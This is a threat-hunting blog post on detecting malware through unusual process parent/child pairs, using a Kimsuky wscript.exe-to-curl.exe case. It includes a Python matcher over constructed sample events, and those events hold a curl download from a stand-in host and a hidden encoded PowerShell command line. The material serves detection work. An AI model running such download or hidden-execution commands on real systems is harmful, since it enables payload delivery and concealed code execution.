185. Using Process Parent and Children Relationships for Detection and Hunting
Hello everyone!
Today we're going to talk about some basics. Basics like these are extremely important to document and use. I'm talking about process parent and child relationships.
The thing is, some processes rarely or never spawn certain other processes in a legitimate way. So if you see such a behaviour marker, it is most likely related to malicious activity. The problem is that there can be a great many variants of such markers, and each one has to be documented separately and checked against what is normal in your environment before it becomes an alert.
Let's look at an example, which belongs to Kimsuky. It's a malicious VBS file. If we look at it closely, we can see that in this case wscript.exe spawns curl.exe to download another malicious file. Here is an example of a behaviour marker we can use for detection or hunting (note that the path fields hold the full image path, so depending on your platform you may need a "contains" or "ends with" match rather than an exact one):
event_type: "processcreatewin"
AND
proc_p_file_path: "wscript.exe"
AND
proc_file_path: "curl.exe"
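To show how the marker above works in practice, here is an added Python example (not from the original post) that runs the same parent/child logic over a few constructed process-creation events using the post's field names. The wscript.exe -> curl.exe pair is the one from the post; the other two pairs in the list and all the sample paths and command lines are my own assumptions for illustration, not observed Kimsuky data. The example also handles two practical issues: the path fields carry a full image path, so we compare on the file name, and Windows paths are case-insensitive, so we lower-case before matching.

```python
from typing import Dict, Iterable, List, Set, Tuple

# Parent/child pairs that are rarely legitimate. ("wscript.exe", "curl.exe") is the
# marker from the post; the other two are assumed examples and must be baselined
# against your own environment before being used as alerts.
SUSPICIOUS_PARENT_CHILD: Set[Tuple[str, str]] = {
    ("wscript.exe", "curl.exe"),
    ("wscript.exe", "powershell.exe"),
    ("winword.exe", "cmd.exe"),
}

# Constructed sample events (not real telemetry) using the field names from the post.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # the post's marker: wscript.exe spawning curl.exe
        "event_type": "processcreatewin",
        "proc_p_file_path": r"C:\Windows\System32\wscript.exe",
        "proc_file_path": r"C:\Windows\System32\curl.exe",
        "proc_cmdline": r"curl.exe -o C:\Users\Public\update.dat http://example.invalid/p",
    },
    {   # curl.exe launched interactively from explorer.exe: not in the list
        "event_type": "processcreatewin",
        "proc_p_file_path": r"C:\Windows\explorer.exe",
        "proc_file_path": r"C:\Windows\System32\curl.exe",
        "proc_cmdline": "curl.exe --version",
    },
    {   # same pattern, different case and 32-bit paths: must still match
        "event_type": "processcreatewin",
        "proc_p_file_path": r"C:\Windows\SysWOW64\WSCRIPT.EXE",
        "proc_file_path": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\POWERSHELL.EXE",
        "proc_cmdline": "powershell.exe -nop -w hidden -enc ...",
    },
    {   # not a process-creation event: filtered out by event_type
        "event_type": "filecreatewin",
        "proc_p_file_path": r"C:\Windows\System32\wscript.exe",
        "proc_file_path": r"C:\Windows\System32\curl.exe",
    },
]


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def match_events(
    events: Iterable[Dict[str, str]],
    pairs: Set[Tuple[str, str]] = SUSPICIOUS_PARENT_CHILD,
) -> List[Tuple[str, str, str]]:
    """Return (parent, child, cmdline) for every process-creation event whose
    parent/child image names form one of the suspicious pairs."""
    hits = []
    for ev in events:
        if ev.get("event_type") != "processcreatewin":
            continue
        parent = image_name(ev.get("proc_p_file_path", ""))
        child = image_name(ev.get("proc_file_path", ""))
        if (parent, child) in pairs:
            hits.append((parent, child, ev.get("proc_cmdline", "")))
    return hits


if __name__ == "__main__":
    for parent, child, cmdline in match_events(SAMPLE_EVENTS):
        print(f"[!] {parent} -> {child}: {cmdline}")
```

Running it flags the first and third events and ignores the other two. The command line is carried along because the parent/child pair alone tells you something odd happened; the command line tells you what was downloaded or executed, which is what you need next in the investigation.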
See you tomorrow!